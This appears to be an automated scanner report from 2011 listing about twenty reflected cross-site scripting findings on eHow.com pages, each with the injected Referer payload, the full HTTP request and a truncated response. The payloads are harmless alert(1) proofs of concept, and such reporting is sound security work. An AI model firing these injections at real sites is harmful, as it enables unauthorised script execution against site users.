The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5b70</script><script>alert(1)</script>2db931d6be2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_5809012_create-indoor-gardens.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=a5b70</script><script>alert(1)</script>2db931d6be2
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:21 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 78162
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eec4a</script><script>alert(1)</script>7e8c02f9d09 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_6469141_improve-english-grammar-skills.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=eec4a</script><script>alert(1)</script>7e8c02f9d09
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:20 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 76462
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Improve English Grammar Skills | eHow.com< ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aabda</script><script>alert(1)</script>31a3c6ca008 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_7496527_resolve-5-common-grammar-problems.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=aabda</script><script>alert(1)</script>31a3c6ca008
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:00 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 83005
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Resolve 5 Common Grammar Problems | eHow.c ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c21a6</script><script>alert(1)</script>d5f8e9adbce was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_7744253_attach-mini-shades-update-chandelier.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=c21a6</script><script>alert(1)</script>d5f8e9adbce
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:18 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73804
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Attach Mini Shades to Update a Chandelier ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba04d</script><script>alert(1)</script>b64307eba63 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /how_7856914_prevent-chimney-fires.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=ba04d</script><script>alert(1)</script>b64307eba63
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:49 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72254
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df4eb</script><script>alert(1)</script>912910bc2c4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /how_9191_program-rca-universal.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=df4eb</script><script>alert(1)</script>912910bc2c4
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:13 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 83616
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Program an RCA Universal Remote Control | ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c74d1</script><script>alert(1)</script>96f99f29a5c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /internet/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=c74d1</script><script>alert(1)</script>96f99f29a5c
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:31 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72741
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Internet - How To Information | eHow.com</title> ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa308</script><script>alert(1)</script>c5f09faead2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /job-search-and-employment/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=aa308</script><script>alert(1)</script>c5f09faead2
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:29 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72494
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Job Search & Employment - How To Information | eH ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ba46</script><script>alert(1)</script>6b620b72d2c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /lawn-and-garden/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=1ba46</script><script>alert(1)</script>6b620b72d2c
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:40 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71036
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Lawn & Garden - How To Information | eHow.com</ti ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 459d0</script><script>alert(1)</script>02fd6d9f1ec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /legal/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=459d0</script><script>alert(1)</script>02fd6d9f1ec
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:13:55 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73439
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Legal - How To Information | eHow.com</title>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e78a0</script><script>alert(1)</script>8d81708f1d3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /list_6515049_common-english-grammar-mistakes.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=e78a0</script><script>alert(1)</script>8d81708f1d3
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:16 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73796
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c8b8</script><script>alert(1)</script>9bae81c40d8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /list_7189463_grammar-check-tools.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=8c8b8</script><script>alert(1)</script>9bae81c40d8
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:16:21 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73995
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c7b6</script><script>alert(1)</script>085f8aae691 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /lose-weight/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=2c7b6</script><script>alert(1)</script>085f8aae691
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:17:21 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 59165
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Lose Weight - How To Information | eHow.com</titl ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd0e2</script><script>alert(1)</script>e6d76aa30d4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /members.html HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=fd0e2</script><script>alert(1)</script>e6d76aa30d4
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:15:44 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 46009
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8df1a</script><script>alert(1)</script>79b522071ca was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /mental-health/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=8df1a</script><script>alert(1)</script>79b522071ca
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:03 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70558
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Mental Health - How To Information | eHow.com</ti ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df132</script><script>alert(1)</script>95642539c8a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /music/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=df132</script><script>alert(1)</script>95642539c8a
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:05 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70752
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Music - How To Information | eHow.com</title>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a8e2</script><script>alert(1)</script>ac0dd484a7c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /parenting/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=9a8e2</script><script>alert(1)</script>ac0dd484a7c
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:04 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71224
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Parenting - How To Information | eHow.com</title> ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 451e2</script><script>alert(1)</script>fe7844aacb6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /personal-finance/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=451e2</script><script>alert(1)</script>fe7844aacb6
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:05 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 72539
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Personal Finance - How To Information | eHow.com< ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9090e</script><script>alert(1)</script>f31899da430 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /pets-and-animals/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=9090e</script><script>alert(1)</script>f31899da430
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:07 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 73469
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Pets & Animals - How To Information | eHow.com</t ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66406</script><script>alert(1)</script>01977d190a7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /photos/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=66406</script><script>alert(1)</script>01977d190a7
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:17:15 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 69570
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 353c9</script><script>alert(1)</script>9a8f3a3d37b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
Request
GET /plant-care/ HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Referer: http://www.google.com/search?hl=en&q=353c9</script><script>alert(1)</script>9a8f3a3d37b
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:07 GMT
Server: Microsoft-IIS/6.0
ETag:
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 70437
